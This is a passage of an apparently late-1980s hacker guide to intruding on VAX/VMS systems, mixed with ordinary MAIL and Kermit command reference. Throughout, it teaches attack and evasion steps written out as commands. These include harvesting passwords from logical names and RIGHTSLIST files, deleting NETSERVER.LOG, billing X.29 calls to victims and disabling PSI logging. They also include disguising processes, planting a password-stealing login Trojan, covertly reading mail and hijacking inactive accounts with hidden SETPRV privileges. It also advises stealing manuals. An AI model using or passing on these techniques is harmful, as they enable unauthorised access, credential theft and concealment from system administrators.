This will then transfer the rightslist from the other node to your login
directory, giving you a list of all the users on the other system that you can
hack out.
It should be noted that copying files from another node will create a file
on the remote node indicating your transfer. To get rid of this, log onto the
remote node and delete the file called NETSERVER.LOG (just delete the file
versions that you have created, and leave the others alone!)
There is another useful trick that sometimes yields more USER accounts on other
systems. Try typing:
$show logical
This will present you with a giant list of what seem like symbol equates. What
you should look for in here is something that accesses a file in another system
eg.
"mainuaf"=sbsu::sys$system:sysuaf.dat
Many times, a user/password combination is hidden among these definitions. To
find these, simply search the file for occurrences where they have a nodename
such as SBSU followed by a quote and some info. An example:
"mainuaf"=sbsu"system manager"::sys$system:sysuaf.dat
The important part is the info in quotes after the node name. The first item
(before the space) is a username, and the word after the space is the password.
It is rare to find such an occurrence, but it should not be overlooked, since
it can sometimes yield high system level accounts. In this example, node SBSU
has a user called SYSTEM, who's password is MANAGER.
DECNET and PSI
--------------
If you do a SHOW NET and it gives you a list of other nodes, you can connect to
these nodes using the SET HOST command. For example to connect to node SBSU:
$set host sbsu
This will then connect you to SBSU, and you have to go through their login
procedure also. An interesting trick to note is, lets suppose that you have
hacked an account out on node SBSU. What you want to find out is the DATAPAC
or TELENET address of the machine. To do this use:
$mc ncp tell sbsu sh known dte
This will then give you the address of the machine, so that you can call it
directly rather than through this VAX. You may want to do this to increase
speed, since obviously calling through another VAX slows things down a bit.
Another method which often works is to use the SHOW LOGICAL command. By
specifying a certain table, you can sometimes get a list of the NUAs of the
other nodes in the same cluster as your node. To do this type:
$show logical/table=*psi*
An alternative method which is a bit messy and requires higher privileges is to
type out the NETCIRC.DAT file. ie:
$type sys$system:netcirc.dat
On all the systems that I have seen, none of them had WORLD READ access to this
file, so it is not possible to read this with just TMPMBX and NETMBX privileges.
Many times you will want to call a phone number to another machine. To do this
use:
$set host/dte txa0: /dial=number:5551212
This command will dial out to 555-1212 using the terminal TXA0: To dial out a
phone number, you MUST specify a terminal that is hooked up to a modem. To
find out which terminals have modems type:
$show device
This will give you a list of devices hooked up to the VAX. Devices are 4
character strings followed by a colon (:) The terminals that you can use are
usually further down the list. To test the terminal for a modem, use the
following line, which also illustrates the importance of lexicals:
$write sys$output f$getdvi("txa0","tt_modem")
This above line would test the terminal TXA0: to see if it has a modem attached
If it responds with TRUE, then you have a modem, otherwise not. Note that you
must put the terminal name in quotes, and also that you DO NOT enter the colon.
If the VAX you have hacked onto is hooked up on a packet switching system such
as DATAPAC or TELENET, then there is another USEFUL thing you can perform. To
call out NUA's use the /X29 qualifier. For example:
$set host/x29 026245400050570
This would call up the NUA 026245400050570 (altos:tchh). What is interesting
to note is that on many VAX's you can call out to foreign remote nodes such as
in the example and the charge for the collect call is placed to the account
through which you are logged in as. This is a safe and easy method to call out
to PSDN's which are normally long distance from you. It should be noted that
many system managers turn off foreign DNICs, which may limit you to calling
only within your local DNIC.
One precaution you may want to take when using the SET HOST/X29 command is to
turn off logging. Although this is usually turned off, some system managers
may buffer everything you type in and keep it in a file. To temporarily turn
the logging off, try this:
$run sys$system:psipad
It will then ask for NODE: just hit RETURN, then:
PSI>show log_file
this will either say that buffering is off or it will give you a filename with
a directory path. If it is not off then make a note of the file, then type:
PSI>set nolog_file
This will turn off the buffering. After you are through with the remote session
be sure to turn it back on with:
PSI> set log_file xxxx:[xxxx.xxxx]xxxxx.xxx
All the xxx's represent the full filename path that you initially wrote down
when you did the SHOW LOG_FILE command.
I want to point out another interesting trick that sometimes works on certain
accounts. Many a time i have encountered an account on a Vax which would simply
allow you to call out to another node. It had no other purpose, and would
refuse to give you DCL access. If you encounter such an account and it asks
you to enter a nodename, try putting /x29 NUA. This technique allows you to
dial out to remote systems via some PSS even though you do not have DCL access!
An example:
Enter nodename> /x29 026245400050570
If /X29 isn't disabled, this will allow you to call that NUA.
One thing to note is that not all systems allow you to call out using these
methods. Some have /x29 disabled, others have /dial disabled etc. In order to
overcome this barrier, it is important to know which files are involved. If
you want to dial out, you MUST have the modem files (such as DMCL). If you want
to dial out across a PSS, you must have the PSI utility files, and lastly if
you wish to dial out to another node in the cluster you must have RTPAD.EXE on
the local node and REMACP.EXE and RTTDRIVER.EXE on the remote node.
One quick note about finding other VAXes that have PSI utilities on them. Often
you may want to hack only those VAXes that have PSIPAD on them. To determine
if a particular VAX in your cluster has the capability, issue the command:
$dir NODE::sys$system:psi*.*
NODE stands for the nodename that you want to check. If this returns with a
message that no files match, then this particular VAX does not have PSI
installed. If on the other hand it returns with several file names, then it
does have the PSI utilities installed.
This is just a VERY brief overview of the DECnet setup on VAX/VMS systems. For
a more detailed analysis, look for my other file: 'Understanding DECnet and
NCP'
HIDING ON THE SYSTEM
--------------------
There are several methods that allow you to remain undetected once you have
hacked onto a VAX. One of the most important things is to leave things as they
are, in other words, do not delete files or subdirectories. You should also
avoid leaving suspicious looking COM or EXE files that you may have created.
An important ability to have is being able to hide from SHOW USER. There are
several ways of going about this, but the simplest is to become a
non-interactive process. Or to become a subprocess of some other
non-interactive process such as a BATCH or NETWORK process. Although this will
hide you from SHOW USERS, you will still be visible if someone did a SHOW
SYSTEM. To get around this you should also specify your process name to a
printer driver or something. For example:
$show system
Look for the process that has a name of "SYMBIONT_xxxx" where xxxx is a number.
These are the printer drivers on the system. Look for the last number on the
list and then change your own process to one higher than this number. For
example if the last printer is 5 then type:
$set proc/name="SYMBIONT_0006"
At the end of this file i have enclosed a small 20 line assembler program that
you can enter through EDIT. It allows you to hide from SHOW USER by changing
your process to an OTHER non-interactive process. After you assemble the file,
link it and then execute it using the RUN command. You should then copy this
file to some rarely used directory, where no one else will notice it.
OTHER PROCESSES
---------------
So you have hacked your way in, and everything is going smooth. Now you want
to find out what all the other people on the system are doing. There are
several ways of finding out who else is using the system and what they are
doing. Here i will outline some of the basic methods.
Perhaps the simplest command that you can issue to see who else is logged in
is the SHOW USER command.
$show user
a typical output might look like:
VAX/VMS Interactive Users
1-SEP-1989 12:48:51.14
Total number of interactive users=5
PID Username Process Name Terminal
202000B3 DELUCAJ DELUCAJ VTA21: TTA7:
204000C4 <login> _vta13: VTA13: LTA8:
20400138 OPERATOR system monitor VTA17: OPA0:
2040013D POLLACK POLLACK VTA11: TTB0:
204000BC ENTITY FUK YOO VTA15: TTA1:
Ok so what does all this mean?! Well lets go one column at a time. The first
column gives you your process identification number. This is a unique number
that is assigned to each process as it logs in. The number itself really
doesn't matter, however it is required for certain commands. The next column
is the username of the process. This always puts the name of the account that
you logged in with. Sometimes you may notice that instead of a name it says
<login> This indicates that someone is currently going through the login
procedures under that PID. The next column is the process name. This is
defaulted to be the same as your username, but can easily be changed. For
example:
$set proc/name="Hacker!"
This will set your process name to Hacker! Since everybody will see this when
they do a SHOW USER command, it is not recommended that you choose something
that will give you away. In general, you leave this as the default. The next
column shows the virtual terminal that you are logged into. The last column
shows the physical terminal that you are logged into. It is important to check
this last column. You should check to make sure that nobody is logged in under
OPA0: Anyone logged in under this is using the system console, which means
that they could possibly be watching you! Another one to note is RTxx: which
indicates a process that is remotely logged in (ie calling in from another
VAX or something) Other things that you should watch out for are users who are
logged in under the SYSTEM account or any other high-privileged accounts. Any
one of OPERATOR,OPER,SYSTEM,SYSMGR etc could mean trouble for the hacker.
One thing that you may notice on some systems is that a process will be logged
on ALL the time under the OPA0: terminal. What's going on?! Is the system
manager there all the time? No. What happens on many systems is that the
system manager logs into his terminal, and doesn't bother logging out at the
end of the day, leaving his process running often for weeks at a time. There
is no easy way to know if the guy is really there or not. There are two things
you can do. One is to check the time that the account has been IDLE, but there
is no easy way to check this without going into some programming. The next
best you can do is issue the SHOW SYSTEM command. This will show all the
processes currently running, their priority levels, how much CPU time they are
eating up etc. A typical report may look like:
$show system
VAX/VMS X2EN on node DELPHI 01-SEP-1989 15:10:31.02 Uptime 0 12:06:30
Pid Process Name State Pri I/O CPU Page flts Ph. Mem
22200080 NULL COM 0 0 0 16:34:12.00 0 0
22200088 SWAPPER HIB 16 0 0 00:03:52.53 0 0
22200113 ENTITY LEF 4 16505 0 00:00:12.02 8689 233
:
:
:
:
etc etc
This display can give you several important pieces of information about other
processes. The explanation of each column:
PID - the process identification number
Proc Name - the name of the process. Note that certain non-interactive system
processes such as NULL, SWAPPER, ERRFMT etc are always running in
background.
STATE - This is important. This tells you what the process is currently
doing. HIB-hibernating, COM-computing, LEF-active, CUR- current
PRIORITY - the higher the priority number, the higher priority it has in terms
of accessing CPU time.
I/O - Shows the accumulation of the direct I/O and buffered I/O
CPU - the total amount of CPU time the process has used so far
PAGE FLTS - page faults, number of exceptions generated. Not very useful...
PH. MEM - amount of physical memory that the process occupies
A further thing you may notice after the last column on some processes is a
single letter. This is the process indicator, and it can be one of:
B - batch job
S - subprocess
N - network process
Another useful option is the ability to know which files, each of the processes
are accessing. To accomplish this type:
$show devices/files/nosystem
The only problem with this command is that it will not show the filename if you
do not have read access to it. (or the BYPASS privilege)
Perhaps the most POWERFUL tool that the VAX/VMS hacker has is the System Dump
Analyzer (SDA). An important option of this allows you to view all the process
running on the system, what files they are accessing, their process status,
the contents of their virtual memory (such as keyboard buffer) etc etc A VERY
powerful command, it is started with the command:
$analyze/system
The only drawback with this command is that it requires the CMKRNL privilege.
I will discuss this feature in more detail later in the file.
DETACHED ACCOUNTS
-----------------
A very big security loophole which is allowed on many VMS systems are detached
accounts. Basically what this allows you to do is cut carrier instead of
logging out properly. Instead of logging the process out, it is left waiting
on the system. The next user who logs in, instead of getting a Username prompt
will get your shell ($) prompt! There are many useful things you can do with
a detached account. The most obvious use of course is to set up a Trojan Horse
program. Basically you write a procedure that simulates the VAX/VMS login
sequence. After the user enters his/her username-password, you save this info
to a file, give him a 'User authorization failure' and throw him into the real
login sequence. He will think he mistyped something and this time when he
tries, he will be able to log in normally. But in the meantime, you have a copy
of his username/password combination stored away in a file, which you can later
use!
EXAMINING FILES
---------------
Often it becomes necessary to examine a file in greater detail than provided by
a simple TYPE command. For executable and object files there is of course the
ANALYZE/IMAGE and ANALYZE/OBJECT commands, but often you want to have a look at
each individual byte in the file. The best way to do this is to use the DUMP
command. An example:
$dump test.dat
DUMP of file DISK0:[NORMAN]test.dat on 15-APR-1989 15:43:26.08
File ID (3134,818,2) End of file block 1 / Allocated 3
Virtual block number 1 (00000001), 512 (0200) bytes
706d6173 20612073 69207369 68540033 3.This is a samp 000000
73752065 62206f74 20656c69 6620656c le file to be us 000010
61786520 504d5544 2061206e 69206465 ed in a DUMP exa 000020
00000000 00000000 0000002e 656c706d mple............ 000030
00000000 00000000 00000000 00000000 ................ 000040
:
:
:
00000000 00000000 00000000 00000000 ................ 0001E0
00000000 00000000 00000000 00000000 ................ 0001F0
As you can see, this not only shows the ASCII interpretation, but also the HEX
value for each byte. This can be VERY valuable in certain situations. You
should note that since the default is HEXADECIMAL LONGWORD, the bytes seem to
be in a backwords order. This is due to the way the machine stores numbers in
memory: Lo-byte,LSB,MSB,Hi-byte. You can optionally specify the numbers to
come out in decimal or also in single byte format. Example:
$dump sbsu::sys$system:rightslist.dat /byte/header/decimal
See the online HELP files for more detail into the various qualifiers. You
should note that you CAN use dump to access files on OTHER nodes!
CREATING TEXT FILES
-------------------
This isn't the best of places to put this topic, but if I don't do it now, I
will probably forget later on, so here goes...
Often you will need to create files on a system, such as messages to other
hackers, notes to yourself, small DCL programs etc. The basic method is as
follows:
$create file.txt
Hi this is a dumb message that i am typing just to
see how this command works.
<CTRL-Z>
$
Basically what is happening here is you specify a filename and an extension
when using the CREATE command (in this case file.txt) and then the system waits
there for you to type in something. At this point you can type whatever you
want, and to end the message/program/memo just hit CTRL-Z. This will return you
to the DCL prompt. This is an easy method to transmit COM files that you have
either created or buffered from some other system. Just issue the CREATE
command, send the file through your buffer, then hit CTRL-Z to finish it off.
VAX/VMS MAIL SYSTEM
-------------------
Although it is not a good idea to use the MAIL system to send or receive
messages (since the messages can be read by anyone with enough privs) I will
present a brief list of what it can do. One important thing to note is that
whenever there are MAIL messages waiting to be read, they are stored in a file
that ends with the MAI extension. So if the account you have logged into has
received mail, and you really want to read it for some reason, then you can do
the following from DCL:
$type mail.mai
This file is not necessarily called MAIL.MAI, it could be any other name with
a MAI extension. Aside from some header information stored at the beginning
of each message, the rest of the message is mostly in standard ASCII and easily
readable. Doing it this way ensures that the message remains there for the
REAL user when he logs in. (after a message has been read, it is put into
another area, and the user will not see it. This could make him suspicious if
he keeps losing important mail messages!)
Reading MAIL files can be quite useful, because sometimes important messages
are stored here. Like i stated earlier, you shouldn't be actually using MAIL
to read the mail since it will then get deleted, and the actual user will
eventually notice. Also, you shouldn't use the MAIL system to send
hacker-related information (to other hackers) because system managers can
access your mail and read what you have to say.
Basically you can use the MAIL facility in two ways: Interactively and
through the shell. For ease of use I will only describe the interactive method
since it is easier and more flexible. If you insist on doing it from the
shell, then just call up the ONLINE HELP for the qualifiers. In any case, to
interactively use the MAIL utility type:
$mail
This will respond with the prompt:
MAIL>
At this point you can enter the various mail commands. Following is a brief
overview of the more important commands and concepts. At the end, I have
provided a table with all the possible commands that can be entered here.
Heres a brief list of the more important MAIL commands that I will discuss here
SEND DIRECTORY EXTRACT
READ[/NEW] DELETE PRINT
FORWARD MOVE HELP
REPLY SELECT EXIT
The first command to try is the SEND command. Try sending a message to
yourself Enter the SEND command and press RETURN. Enter your own user name at
the prompt and press RETURN. Enter a subject at the prompt and press RETURN
again. The following example shows how to use the SEND command:
MAIL> SEND
To:PIERCE
Subj:Sailing
Enter your message below. Press CTRL-Z when complete, or CTRL-C to quit:
When you finish entering the text of your message, press CTRL-Z. Because you
are sending the message to yourself, MAIL signals that you have just received a
new message by displaying the following message:
New mail on node FLAXEN from PIERCE
MAIL>
Now, you are ready to use the READ command. To read the message you just sent
to yourself, enter the READ command with the /NEW qualifier and press RETURN as
follows:
MAIL> READ/NEW
You must specify the /NEW qualifier with the READ command when you want to read
new mail that arrives while you are in the Mail Utility. When you are not in
the Mail Utility and you receive new mail, invoke MAIL to read the new message,
you can enter the READ command without the /NEW qualifier. Or, if you wish to
read mail that you have already read, you can enter the READ command.
You can forward a copy of a mail message to another user by entering the
FORWARD command. MAIL prompts you for the name of the user to receive the
message. Try forwarding a copy of the message you just received back to
yourself. Enter your own user name and press RETURN. Supply a subject when
prompted and press RETURN MAIL signals that you have just received a new
message. Enter the READ/NEW command to read the forwarded message.
When you receive a message and want to respond to it, enter the REPLY command
and press RETURN. MAIL displays the header information as follows:
MAIL> REPLY
To:FLAXEN::PIERCE
Subj:RE: Using the REPLY command
Enter your message below. Press CTRL-Z when complete, or CTRL-C to quit:
When you finish typing your response, press CTRL-Z. Again, MAIL signals that
you have just received a new message. To read the message, enter the READ/NEW
command.
When you want to see a list of all the mail messages you have collected, enter
the DIRECTORY command and press RETURN. MAIL displays a list like the
following:
# From Date Subject
1 FORBES 1-SEP-1989 How to Write a Memo
2 SBSU::BERT 2-SEP-1989 Using the Printer
3 FROST::BASTIEN 4-SEP-1989 Chicken Kiev
When you want to remove a message, use the DELETE command. You can either
enter the DELETE command while you are reading the message or you can enter the
DELETE command followed by the number of the message you want to remove. To
remove the second message in the list, enter the following command line:
MAIL> DELETE 2
If you enter the DIRECTORY command after you have deleted a message (or
messages), you see the messages marked for deletion, as follows:
# From Date Subject
1 FORBES 1-SEP-1989 How to Write a Memo
2 (Deleted)
3 FROST::BASTIEN 4-SEP-1989 Chicken Kiev
When you exit from MAIL, the messages marked for deletion disappear.
The Mail Utility allows you to organize your messages by moving them into
folders. To move a message to a folder, enter the MOVE command (while you are
reading the message) and press RETURN. MAIL prompts you for a folder name.
Type any name, for example, REVIEWS or JOKES or STATUS_REPORTS. MAIL also
prompts you for a file name. You can specify the default mail file by pressing
RETURN. A sample session demonstrating the MOVE command follows:
MAIL> 2
MAIL> MOVE
_Folder: HACKERS
_File: <RET>
Folder HACKERS does not exist.
Do you want to create it (Y/N, default is N)? Y
%MAIL-I-NEWFOLDER, folder HACKERS created
In this example, the folder name is HACKERS and the default mail file is
specified. If the folder you name does not exist, MAIL asks you if you want to
create it.
Once you have created folders, you may want to move between them. To move from
one folder to another, use the SELECT command. If you want to move to the
HACKERS folder, enter the SELECT command as follows:
MAIL> SELECT HACKERS
%MAIL-I-SELECTED, 1 message selected
In this example, MAIL displays a message indicating the number of messages in
the folder.
To move to a folder named JOKES, enter the following command line:
MAIL> SELECT JOKES
%MAIL-I-SELECTED, 32 messages selected
You can enter the DIRECTORY command to see a list of the messages in the folder
you just selected.
When you want to move a mail message from your mail file to a sequential file
that you can access from the DCL command level, use the EXTRACT command.
Enter the EXTRACT command (while you are reading the message) and press RETURN.
MAIL prompts you for the name of a file. Then, when you exit from MAIL, the
file is listed in your directory. The following example shows how to use the
EXTRACT command to move a mail message to a file named GAMES.DAT.
MAIL> EXTRACT
_File: GAMES.DAT
%MAIL-I-CREATED, DISK:[BERGMAN]GAMES.DAT;1 created
MAIL>
To print a hard copy of a mail message, enter the PRINT command while you are
reading the message and press RETURN. (When you exit from MAIL, the message
enters the print queue.) The following example shows how to make a hard copy of
message #4 by using the PRINT command:
MAIL> 4
#4 4-AUG-1989 09:39:20 MAIL
From: SPARTA::FELLINI
To: MARSTON
Subj: Rydell's Reasons
In reference to the meeting of July 26, I would like to explain
Rydell's opinion more fully...
MAIL> PRINT
When you are ready to leave MAIL, enter the EXIT command and press RETURN.
Any messages marked for deletion disappear. Any messages marked for printing
enter the print queue and the following message is displayed:
MAIL> EXIT
Job MAIL (queue ATLAS_PRINT, entry 43) started on QUEUE$LPA0
The next section is a detailed look at what is possibly the most important of
the MAIL commands -- SEND
Format: SEND [filespec]
Sends a message to another user(s). Use the SEND command and the MAIL command
interchangeably because they work the same way. MAIL prompts you first for the
name of the user(s) to receive the message. You reply with the user name(s)
or with the file name of a distribution list file(s), in the following format:
[[nodename::]username,...] [,] [@listname[,...]]
If you have entered the SET CC_PROMPT command or used the /CC_PROMPT qualifier,
you can then specify names of users to receive carbon copies of the message at
the CC: prompt.
Next, MAIL prompts you for the subject of the mail. To avoid the "Subj:"
prompt specify the /SUBJECT qualifier with the SEND command.
You can include a file specification with the SEND command. If you specify a
file with the SEND command, the text in that file is sent to the specified
user(s). If you do not specify a file, MAIL prompts you for the text of your
message.
Enter the message that you want to send; then press <CTRL-Z>. Note that once
you have typed a line and pressed RETURN, there is no way to edit it. If you
decide not to send a message you are typing but want to stay within the Mail
Utility, press <CTRL-C> to abort the message. You then receive the MAIL>
prompt. CTRL-Z exits you from MAIL.
Examples
--------
1.
MAIL> SEND/LAST
To:FLIGHT::MYERS
Subj:Geometric Concepts
MAIL>
This example shows how to send a copy of the last mail message you sent to a
user named Myers on node FLIGHT.
2.
MAIL> SEND/SELF/SUBJECT="Good Harbor"
To:DAPPER::WAYNE
Enter your message below. Press CTRL-Z when complete, or CTRL-C to quit:
This example shows how to send a mail message to a user named WAYNE on node
DAPPER. The /SELF qualifier enables MAIL to send a copy of the same message
back to you. The subject of the message is Good Harbor. Since the /SUBJECT
qualifier was specified, there is no Subject: heading.
3.
MAIL> SEND
To:BAKER,MARSTON,@SUPERVISORS
Subject:Handling Stress
Enter your message below. Press CTRL-Z when complete, or CTRL-C to quit:
This example shows how to send a mail message to two users (BAKER and MARSTON)
and a distribution list (SUPERVISORS).
One of the important concepts relating to MAIL is the idea of FOLDERS. All
mail files are subdivided into folders. By default, your mail file (MAIL.MAI)
contains a folder called MAIL. The MAIL folder contains messages that you have
already read. When you receive new mail messages, they automatically enter
into a folder named NEWMAIL. After you read the messages in the NEWMAIL
folder, they automatically move into the MAIL folder and the NEWMAIL folder
disappears. When you delete a message it automatically moves into the
WASTEBASKET folder. Deleted messages collect in the WASTEBASKET folder until
you empty it. To emtpy the WASTEBASKET, enter either: EXIT or PURGE You can
create as many folders as you want. You always know which folder you are
currently in because the name of the folder is displayed at the top right
corner of the screen when you enter the READ or DIRECTORY command. You can
enter the DIRECTORY/FOLDER command to see a display of the existing folders in
the current mail file. (use the MOVE command for creating new folders) You can
remove a folder by deleting all the messages that it contains.
A look at a sample MAIL heirarchy:
[mailfile1] [mailfile2] [mailfile3]
! ! !
! +-----+---------+ +----+---------+
[folder1] [folder1] [folder2] ! !
! ! ! [wastebasket] [folder1]
! +-+-----+ message1 ! !
message ! ! garbage1 message1
message1 message2
MAILFILE ---> FOLDERS ---> MESSAGES
MAIL COMMANDS OVERVIEW
----------------------
Here I have provided a listing of all the commands that you can issue from the
mail utility and a brief description of what each one does:
Command Description
-----------+-------------------------------------------------------------------
ANSWER ! Same as the REPLY command. See below
ATTACH ! Allows you to switch to another process in your job
BACK ! Displays the last message read
COMPRESS ! Makes an indexed sequential mail file smaller
COPY ! Copy a message to another folder, without deleting original
CURRENT ! Displays the beginning of the message you are currently reading
DEFINE ! Allows you to define keys as macros
DELETE ! Delete a message
DIRECTORY ! Displays a list of the messages in the current folder
EDIT ! Enables you to edit a message before it is sent
ERASE ! Clears the screen
EXIT ! Exits from the MAIL utility
EXTRACT ! Places a copy of the current message into a sequential file
FILE ! Moves the current message to the specified folder
FIRST ! Displays the first message in the current folder
FORWARD ! Sends a copy of the message you just read to another user
KEYPAD ! Define the keypad
LAST ! Displays the last message in the current folder
MAIL ! Sends messages to another user. Identical to the SEND command
MOVE ! Moves the current message to the specified folder
NEXT ! Skips to the next message and displays it
PRINT ! Dumps messages to the PRINTER
PURGE ! Deletes all messages in the WASTEBASKET folder
QUIT ! Quits MAIL without deleting messages in WASTEBASKET
READ ! Displays your messages
REPLY ! Sends a message to the sender of the message you are reading
SEARCH ! Searches the current folder for the message containing a string
SELECT ! Allows you to switch to another folder
SEND ! Send a message to another user
SET-SHOW ! Review or Modify various characteristics of the MAIL utility
SPAWN ! Create a sub-process. Often useful to the hacker...
-----------+-------------------------------------------------------------------
COMPILING PROGRAMS
------------------
Once you are comfortable with the VAX/VMS operating system, you will probably
want to write yourself some useful little hacker utility programs. Although
many can be simply written as DCL script files, often the occasion arises where
the use of a high-level language is necessitated. Through a high-level
language you have full access to the system services, as well as a lot more
control of what you want the VAX to do. Here I will very briefly show how to
write, compile and execute a basic program. Creating executable files in other
languages follows the same overall procedures: To activate basic from the shell
type:
$basic
This should put you into the VAX-BASIC environment, and the terminal will print
READY on your screen. If just typing BASIC doesn't work, you may want to try:
$mc basic
This sometimes works, but it should be noted that BASIC is not found on all
VAX's. Some have it, some don't. In any case, whenever you are editing a
program, you should never leave source code lying around. The best way is to
edit the file on an online buffer editor, and then transmit the file. It
should always be done in this manner unless your file is VERY large, and it
would be cumbersome to keep uploading it. If you must, then to save your
creation onto the VAX, just type:
save "filename"
This will save the source code with a .BAS extension. You should rename this &
hide it in some seldom checked directory. After you have finalized your coding
you should create an executable file, download your source code, and then
delete the one online. To create an executable file, first you must exit back
to DCL, do this by typing EXIT. Then once in DCL type:
$compile filename.bas
$link filename
$delete filename.obj;*
Note that you can link multiple OBJ files together, just like in MS-DOS. It
should also be noted that to create truly useful programs you will need to get
your hands on a system services manual. Through the system services you can
gain all kinds of information about the system and any nodes that it is hooked
up to.
NOTE: type HELP in BASIC to get a complete list of all the commands and syntax
ATTAINING MANUALS
-----------------
As you can see, if you are going to get anywhere, you will have to get your
hands on some manuals. Perhaps the best book you should invest in is "VAX/VMS
INTERNALS AND DATA STRUCTURES". This book concentrates on explaining all the
data structures as well as all the system service calls and how everything
basically works inside a VAX. Once you have read and understood this book,
VAX/VMS kernal programming should become a snap. Its available at most big
bookstores but it costs about $130 (Canadian funds). You may also want to look
at your local library or University library, since they usually carry this book
and other ones you may want to grab. Aside from these places the next best
place to get major information is from the actual VAX/VMS manuals.
Unfortunately these cannot be bought at any store. However there are several
ways you can get your hands on one. One method is to go work at a company
during the summer that uses VAX'es. Then just grab the manuals or better yet,
photocopy them. (be forewarned though. Theres several thousand pages worth of
useful info!) Or if you know someone else who works at such an establishment,
you can get them to heist the manuals for you. Other good techniques are
taking guided tours of offices of large corporations. This is the BEST method,
because you can usually pick up a lot of stuff. Just make sure you go with a
friend (to distract the guide, lookout etc) and carry a school bag with you.
When they get to the computer room, start looking around. Usually they will
have the manuals in some big shelf somewhere. Just grab yourself whatever you
need. Also keep a lookout for other useful info laying around such as system
accounts, dialups etc If you really need to find the number of a VAX and you
don't see it posted anywhere, then you should get yourself a cheap little
phone. (you know those K-MART $4.99 jobs) Take the phone plug out of the jack,
plug in your phone and dial up your local ANI. This will give you the phone
number to the dialup. It should be noted that not all VAX's allow remote
logins. This can be adjusted from the SYSUAF setup via the AUTHORIZE program.
Local ANI's for TORONTO are:
997-8123
997-1234
997-1699
If you don't have any Local ANI's, then just ask around on your local
PHREAK/HACK boards.
CREATING/MODIFYING ACCOUNTS
---------------------------
The job of creating, modifying and deleting users is performed via the image
AUTHORIZE. This program is always found in the sys$system directory, and
requires at least the SYSPRV privilege. If you do not have this (or SETPRV)
then you cannot execute this file. Assuming you have hacked out an account
with the required privilege or you have via some mechanism boosted your privs,
then this is how to start up AUTHORIZE:
$sd sys$system
$run authorize
This will return you with the UAF prompt:
UAF>
At this point you can make modifications to the User Authorization File (UAF).
It should be noted that the two files that this program accesses are SYSUAF.DAT
and RIGHTSLIST.DAT, and both of these are found in the SYS$SYSTEM directory.
First, heres the quick and dirty way to create a new user:
UAF> add username /password=whatever/priv=setprv
This is basically the minimum requirements for creating a high-privileged user
on a system. Of course, you should try and avoid adding new users in where
possible. It is a much better idea to try and find an INACTIVE user who hasn't
logged in for quite a while and change their password to whatever you want.
This way, any system operator will not get suspicious because of a new
username. In addition, when granting privileges to either your own user, or
modifying some other user, you should NEVER give them ALL privs. The reason is
simple: IT STANDS OUT! Anybody going through the sysuaf database can
immediately pick out such accounts, and you will be found out very quickly. If
you must give all privs then the better way is to simply grant the SETPRV
privilege as the normal privilege. (do not assign it as a default however) The
reason for this is that this will not stand out as much. By not assigning it
as a default, if the real user happens to log in for any reason, they will not
see it as one of their privs when performing a SHOW PROC/PRIV. The only way to
activate your hidden privileges is by issuing:
$set proc/priv=all
Here I will briefly outline the commands you can perform from UAF:
Command Description
-------------------------------------------------------------------------------
ADD !This as you know will add a new user. You may specify many qualifiers
!when creating the account. See the online HELP for further information.
COPY !Allows you to copy any record in the UAF to a new user.
CREATE !Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT files if
!they don't already exist.
DEFAULT!Allows you to change any item in the DEFAULT record in SYSUAF.DAT
EXIT !Terminate authorize and go back to the VMS shell.
GRANT !Grants an identifier name to a user UIC
LIST !Makes a listing file (SYSUAF.LIS) which gives information on the records
!specified. MODIFY !Allows you to modify an existing user. see below for
further discussion REMOVE !This allows you to delete an existing user record
RENAME !This allows you to change the username of a record REVOKE !Revokes an
identifier name from a username or UIC identifier SHOW !Allows you to view the
records in SYSUAF.DAT, RIGHTSLIST.DAT and !NETUAF.DAT
-------------------------------------------------------------------------------
The commands you will be using most from here are SHOW and MODIFY. Show can be
used to isolate INACTIVE accounts (based on last login), failed login attempts
etc. The MODIFY command will let you change any characteristic in any of the
records. Below I will give a short discussion on some of the more important
qualifiers that can be specified. Note that exactly the same thing applies to
the ADD command:
/ACCESS -if the account is set up for no remote access or whatever, just
include this qualifier (no parameters) to gain FULL access.
/DEFPRIV -your default privileges. These are the privileges that are active
upon login
/DIR -the directory assigned to you upon login. ie. SYS$LOGIN
/DEVICE -the drive that the directory is in.
/FLAGS -this is an important one! You can specify things such as CAPTIVE
accounts, NODISUSER, and many others.
/LGICMD -the file that is executed upon login. Normal setting would be
/LGICMD=login.com
/PASSWORD-primary password
/PRIORITY-CPU priority. Normal setting is 4
/PRIV -your assigned privileges. Should NOT use ALL, very conspicuous.
/PWDMIN -minimum password length
/UIC -User Identification Code
On most systems you will find a file called ADDUSER.COM which allows the system
manager to create new users. It is a DCL file which simplifies the task of
creating new users by prompting you for all the necessary parameters. If this
file does not exist on the system, here I have outlined the manual method of
creating a new user (this is the FULL setup):
$sd sys$system
$run diskquota
NOTE: All variables that you must enter are in square brackets, eg. [uic]
QUOTA>add [uic] /perm=[quota]/overdraft=[overdraft]
Basically this sets up how much disk space is allotted to the user. The quota
usually ranges from 1000 blocks to 100000 blocks. The overdraft is usually 10%
of the quota. A good setting to keep this at is around 20000 for the quota.
$create/dir/owner=[uic]/prot=(s,o=rwed,g,w) [directory]/log
This will add in your directory and set its protections.
$run authorize
UAF> add [username]/own=[fullname]/acco=[account]/dev=[device]/dir=[directory]-
/uic=[uic],[privs]/passw=[password]
The items here are:
username -the name you will use on the system, eg. SMITHJ
fullname -your actual name, eg John Smith. (of course you don't use your REAL
name!!)
account -your account name, usually used for billing purposes
device -the drive that contains your directory
directory -your login directory. Best to keep an existing one
uic -your UIC remember format: [group,member]
password -your account password. You can enter whatever you want here
privs -your account privileges. Normal is TMPMBX and NETMBX. If you must
then specify SETPRV to give you full access to the system
That ties up this section. For further information about a specific qualifier
just type HELP from the UAF> prompt.
KERMIT
------
Kermit is a file transfer program found on most VAX systems. It allows the
transfer of files over terminal lines from a remote KERMIT program to the local
KERMIT program. Invoking Kermit can be done in several ways depending on the
system. Usually the file is located in the SYS$SYSTEM directory. The usual
method to start kermit is:
$kermit
NOTE: some machines it may be KERMIT-32 or some other variation.
This may vary on different machines, you may have to RUN the file, or it may
have to be passed parameters such as KERMIT 1200 or KERMIT 2400. In any case
once you have initiated the program, you should get a kermit prompt:
KERMIT>
Here you can issue several different commands. Following is a list with brief
explanations:
COMMAND DESCRIPTION
-------------------------------------------------------------------------------
connect !connects you to a virtual terminal, issue AT commands from here.
exit !return to DCL
quit !return to DCL. Same as above
receive !Single file download from another machine
get !identical to receive
bye !terminates a transaction with another kermit in server mode
finish !same as above but doesn't exit to DCL
send !Send a file to another machine
server !causes kermit to enter server mode
set !set parameters such as parity, delay etc
show !show the parameters set up currently
status !current status such as number of bytes transmitted etc
